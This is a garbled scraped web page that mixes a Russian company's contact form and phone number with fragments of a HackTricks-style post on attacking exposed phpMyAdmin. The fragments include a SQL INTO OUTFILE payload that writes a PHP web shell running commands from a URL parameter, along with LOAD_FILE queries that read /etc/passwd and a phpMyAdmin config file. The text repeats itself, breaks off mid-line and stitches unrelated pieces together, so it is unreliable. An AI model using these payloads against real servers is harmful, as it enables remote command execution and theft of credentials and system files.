+7 (812) 305-22-34
Контакты

Hacktricks - Phpmyadmin

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; → Needs FILE privilege & writable dir.

Have you ever found phpMyAdmin exposed externally during a test? 👇 phpmyadmin hacktricks

#CyberSecurity #BlueTeam #DatabaseSecurity #phpMyAdmin #HackTricks Post: SELECT "&lt;

📁

SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.inc.php'); 4️⃣ – Bypass restrictions. " INTO OUTFILE "/var/www/html/shell.php"

Напишите нам

CAPTCHA на основе изображений
Введите символы, которые показаны на картинке.